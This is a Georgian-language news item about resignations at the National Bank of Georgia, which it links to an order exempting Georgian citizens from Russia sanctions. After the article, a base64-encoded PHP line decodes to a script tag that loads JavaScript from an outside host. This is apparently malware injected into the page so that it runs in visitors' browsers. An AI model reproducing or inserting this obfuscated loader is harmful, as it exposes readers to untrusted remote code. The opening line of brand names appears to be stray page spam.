celsiusi
ავერსი საქკაბელი

თანამდებობა სებ-ის საზედამხედველო პოლიტიკის დეპარტამენტის მარეგულირებელი პოლიტიკის განვითარების განყოფილების უფროსმა ეკა ბერიანიძემ დატოვა, ინფორმაციას bm.ge-ი ავრცელებს. 

აღნიშნულის შესახებ ინფორმაცია bm.ge-ის თავად ეკა ბერიანიძემ დაუდასტურა, თუმცა თანამდებობის დატოვენის  მიზეზებზე საუბარი არ ისურვა.

ეკა ბერიანიძე საქართველოს ეროვნულ ბანკში 2016 წლიდან სხვადასხვა პოზიციაზე მუშაობდა. ის ჩართული იყო საფინანსო სექტორში კონკურენციის მარეგულირებელი აქტების შემუშავების პროცესებში. 

Bm.ge-ის ინფორმაციითვე, საქართველოს ეროვნული ბანკიდან კიდევ ერთი თანამშრომლის წასვლა სებ-ში განვითარებულ პროცესებს უკავშირდება, რომელიც ნათია თურნავას მიერ ე.წ. საგამონაკლისო ბრძანების გამოცემას მოჰყვა. 

შეგახსენებთ, რომ გუშინ ცნობილი გახდა, ეროვნული ბანკიდან იურიდიული დეპარტამენტის უფროსი თანამდებობის დატოვების შესახებ. მანამდე კი, სებ-ი ადამიანური რესურსების მართვის განყოფილების უფროსმაც დატოვა. 

ცნობისთვის, ე.წ. საგამონაკლისო ბრძანების დამტკიცების შემდეგ, სებ-ის სამმა ვიცე პრეზიდენტმა - არჩილ მესტვირიშვილმა, პაპუნა ლეჟავამ და ნიკოლოზ გაგუამ დატოვეს. ასევე თანმადებობა დატოვა გიორგი ბაქრაძემაც.

სებ-ის პრეზიდენტის მოვალეობის შემსრულებლის ე.წ. საგამონაკლისო ბრძანება რუსეთისთვის დაწესებული ფინანსური სანქციების აღსრულების წესში საქართველოს მოქალაქეებისათვის გამონაკლისის დაშვებას გულისხმობს. ნათია თურნავამ აღნიშნული ბრძანება აშშ-ის მიერ საქართველოს ყოფილი მთავარი პროკურორის ოთარ ფარცხალაძის სანქცირების შემდეგ გამოსცა. 

313
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");